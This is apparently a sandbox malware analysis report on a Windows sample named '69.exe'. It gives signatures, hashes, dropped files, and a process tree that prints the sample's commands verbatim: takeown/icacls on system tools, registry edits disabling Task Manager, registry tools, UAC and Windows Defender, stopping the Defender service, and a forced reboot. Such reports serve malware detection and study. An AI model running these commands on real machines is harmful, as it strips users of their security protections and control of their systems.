Resubmissions

10-10-2024 22:41

241010-2mlydswbmn 10

21-09-2024 20:56

240921-zq2f5stcqk 3

21-09-2024 19:40

240921-ydv8xszdjp 10

21-09-2024 19:07

240921-xszn8aybqe 10

Analysis

  • max time kernel
    7s
  • max time network
    7s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21-09-2024 19:07

Errors

Reason
Machine shutdown

General

  • Target

    69.exe

  • Size

    2.4MB

  • MD5

    165b9d15346eed1bd8da9780eb7ab4bf

  • SHA1

    a9895dca7b49cd345634809d03baa51d5078c639

  • SHA256

    6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7

  • SHA512

    b70d1ca87b71b2d0b9611e51e0a26e27b7d1a75072113965cbced770e3f46d9b7147225cb566ec06cac2921f8e4860faf882f96d2a866b2408dfacd4aaeecbf7

  • SSDEEP

    49152:GpUlRhMQfcBROIbrGTPmbpzyLdKDfWLDooV9VwwzuDDFDdexGQw:GpUlBcjnpkwfkkS9V/YTAGj

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 8 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 3 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 27 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69.exe
    "C:\Users\Admin\AppData\Local\Temp\69.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\PerfLogs\windows\exec.exe
        "C:\PerfLogs\windows\exec.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"
          4⤵
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\PerfLogs\windows\jumpscare.exe
            jumpscare.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of WriteProcessMemory
            PID:1720
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\jumpscare.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2376
              • C:\Program Files\Windows Media Player\wmplayer.exe
                wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
                7⤵
                • Enumerates connected drives
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1424
          • C:\PerfLogs\windows\rnbowspam.exe
            rnbowspam.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of WriteProcessMemory
            PID:1380
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\rnbowspam.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1276
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K rainbow.bat
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:760
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1428
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2228
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1944
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2212
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2016
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2944
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2896
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2336
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2472
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2280
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:432
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1952
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1328
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2896
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2164
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1860
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:3040
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2192
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1596
              • C:\Windows\system32\timeout.exe
                timeout /t 1
                7⤵
                • Delays execution with timeout.exe
                PID:2040
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K rainbow.bat
                7⤵
                  PID:1808
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                    • Delays execution with timeout.exe
                    PID:288
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                    • Delays execution with timeout.exe
                    PID:2244
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                    • Delays execution with timeout.exe
                    PID:3068
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                    • Delays execution with timeout.exe
                    PID:2576
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                    • Delays execution with timeout.exe
                    PID:808
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  7⤵
                  • Delays execution with timeout.exe
                  PID:2396
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /K rainbow.bat
                  7⤵
                    PID:2220
                  • C:\Windows\system32\timeout.exe
                    timeout /t 1
                    7⤵
                    • Delays execution with timeout.exe
                    PID:444
              • C:\Windows\System32\takeown.exe
                takeown /f taskmgr.exe
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:376
              • C:\Windows\System32\takeown.exe
                takeown /f sethc.exe
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:2520
              • C:\Windows\System32\icacls.exe
                icacls "sethc.exe" /granted "Admin":F
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:988
              • C:\Windows\System32\icacls.exe
                icacls "taskmgr.exe" /granted "Admin":F
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:1508
              • C:\Windows\System32\takeown.exe
                takeown /f reg.exe
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:588
              • C:\Windows\System32\icacls.exe
                icacls "reg.exe" /granted "Admin":F
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:572
              • C:\Windows\system32\takeown.exe
                takeown /f regedit.exe
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:1724
              • C:\Windows\system32\icacls.exe
                icacls "regedit.exe" /granted "Admin":F
                5⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:604
              • C:\Windows\system32\reg.exe
                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
                5⤵
                  PID:2576
                • C:\Windows\system32\reg.exe
                  reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
                  5⤵
                    PID:1132
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
                    5⤵
                      PID:1080
                    • C:\Windows\system32\reg.exe
                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
                      5⤵
                        PID:1612
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                        5⤵
                        • UAC bypass
                        PID:1624
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                        5⤵
                          PID:2296
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                          5⤵
                            PID:808
                          • C:\Windows\system32\reg.exe
                            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
                            5⤵
                              PID:2168
                            • C:\Windows\system32\reg.exe
                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                              5⤵
                                PID:2216
                              • C:\Windows\system32\reg.exe
                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
                                5⤵
                                  PID:1648
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                  5⤵
                                    PID:2164
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
                                    5⤵
                                    • Sets desktop wallpaper using registry
                                    PID:2188
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
                                    5⤵
                                      PID:2044
                                    • C:\Windows\system32\rundll32.exe
                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                      5⤵
                                        PID:2248
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
                                        5⤵
                                        • Modifies system executable filetype association
                                        • Modifies registry class
                                        PID:2160
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
                                        5⤵
                                        • Modifies registry class
                                        PID:1860
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                        5⤵
                                        • Disables RegEdit via registry modification
                                        PID:1092
                                      • C:\Windows\system32\sc.exe
                                        sc stop WinDefend
                                        5⤵
                                        • Launches sc.exe
                                        PID:1724
                                      • C:\Windows\system32\sc.exe
                                        sc config WinDefend start=disabled
                                        5⤵
                                        • Launches sc.exe
                                        PID:944
                                      • C:\Windows\system32\shutdown.exe
                                        shutdown -r -t 0
                                        5⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2352
                              • C:\Windows\system32\LogonUI.exe
                                "LogonUI.exe" /flags:0x0
                                1⤵
                                  PID:688
                                • C:\Windows\system32\conhost.exe
                                  \??\C:\Windows\system32\conhost.exe "-1479522427372120-82456797910118033231390140125-4662704141658235516-1118853509"
                                  1⤵
                                    PID:2248
                                  • C:\Windows\system32\LogonUI.exe
                                    "LogonUI.exe" /flags:0x1
                                    1⤵
                                      PID:1216

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\PerfLogs\windows\69rnspam.exe

                                      Filesize

                                      87KB

                                      MD5

                                      727793378d36b60cae54319b2f5e9e4d

                                      SHA1

                                      2171ea2f0ea01b39c71ea216a945816fa9ffe751

                                      SHA256

                                      b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2

                                      SHA512

                                      66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91

                                    • C:\PerfLogs\windows\exec.exe

                                      Filesize

                                      90KB

                                      MD5

                                      236f1bc0ecb98edb8efdc31da513e819

                                      SHA1

                                      47cc4e73c0f6d717eba708cf468bf6ecb9970086

                                      SHA256

                                      517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4

                                      SHA512

                                      e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109

                                    • C:\PerfLogs\windows\jumpscare.exe

                                      Filesize

                                      87KB

                                      MD5

                                      5425f894a45d90bac30ff9a34d2ad2f3

                                      SHA1

                                      3d9b9708b4eb917142e7fb59ba61534db2c84e7b

                                      SHA256

                                      5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2

                                      SHA512

                                      9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7

                                    • C:\PerfLogs\windows\killrunas.vbs

                                      Filesize

                                      219B

                                      MD5

                                      fb63b21fb318509a75324b1037da7876

                                      SHA1

                                      ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1

                                      SHA256

                                      3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05

                                      SHA512

                                      03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1

                                    • C:\PerfLogs\windows\logon_overwrte.exe

                                      Filesize

                                      87KB

                                      MD5

                                      f8df0742068fa14d5a4502de32acf41b

                                      SHA1

                                      f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0

                                      SHA256

                                      9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc

                                      SHA512

                                      e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186

                                    • C:\PerfLogs\windows\rainbow.bat

                                      Filesize

                                      320B

                                      MD5

                                      9d25a94b77c178f0d19bdd8440aaaade

                                      SHA1

                                      c732a091461e0ebbd69f6f64b70016e13856908c

                                      SHA256

                                      55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9

                                      SHA512

                                      e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d

                                    • C:\PerfLogs\windows\rnbowspam.exe

                                      Filesize

                                      87KB

                                      MD5

                                      e000d863f54529348b39030cbaf19aad

                                      SHA1

                                      9138d2cb83508bf24edee9cb581f60700a1c2b9b

                                      SHA256

                                      5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea

                                      SHA512

                                      72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df

                                    • C:\PerfLogs\windows\tape.mp4

                                      Filesize

                                      1.7MB

                                      MD5

                                      3784764b2a5db2e23e744eaff79f40c8

                                      SHA1

                                      33994de53dcf82b834961421b863181763166954

                                      SHA256

                                      2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf

                                      SHA512

                                      f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f

                                    • C:\PerfLogs\windows\warn.vbs

                                      Filesize

                                      209B

                                      MD5

                                      2f1738d26b35388f87f905ecc98cf408

                                      SHA1

                                      f1d20ac33b739f3d50d30891b743ef4374abbc5f

                                      SHA256

                                      83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba

                                      SHA512

                                      e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2

                                    • C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat

                                      Filesize

                                      3KB

                                      MD5

                                      47814c389b7e63ed5a13aa8dcc435f23

                                      SHA1

                                      06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7

                                      SHA256

                                      2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48

                                      SHA512

                                      0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382

                                    • C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat

                                      Filesize

                                      113B

                                      MD5

                                      5b094d5e0e750e15ab5628f608756249

                                      SHA1

                                      c73caec179b8baf3833413aaab31c384c48ccd45

                                      SHA256

                                      5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f

                                      SHA512

                                      5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d

                                    • C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat

                                      Filesize

                                      158B

                                      MD5

                                      517cae8cc74a0ef3cff3ca7f7dc1aa34

                                      SHA1

                                      af1538a03dfa1678ab2117c715682527e22f2450

                                      SHA256

                                      a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194

                                      SHA512

                                      8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573

                                    • C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt

                                      Filesize

                                      128B

                                      MD5

                                      a6ef45b0aa8443dfea5daaa1bac6a671

                                      SHA1

                                      b27edc165fd8c892af4442698e623d14dfa87899

                                      SHA256

                                      6ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2

                                      SHA512

                                      13762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de

                                    • memory/1424-110-0x0000000004760000-0x000000000476A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/1424-108-0x0000000004760000-0x000000000476A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/1424-129-0x0000000004550000-0x0000000004750000-memory.dmp

                                      Filesize

                                      2.0MB

                                    • memory/1424-138-0x0000000004F90000-0x0000000004F9A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/1424-128-0x0000000004550000-0x0000000004750000-memory.dmp

                                      Filesize

                                      2.0MB

                                    • memory/1424-163-0x0000000005600000-0x000000000560A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/1424-162-0x0000000005600000-0x000000000560A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/1424-125-0x0000000004550000-0x0000000004750000-memory.dmp

                                      Filesize

                                      2.0MB

                                    • memory/1424-107-0x0000000004390000-0x000000000439A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/1424-106-0x0000000004390000-0x000000000439A000-memory.dmp

                                      Filesize

                                      40KB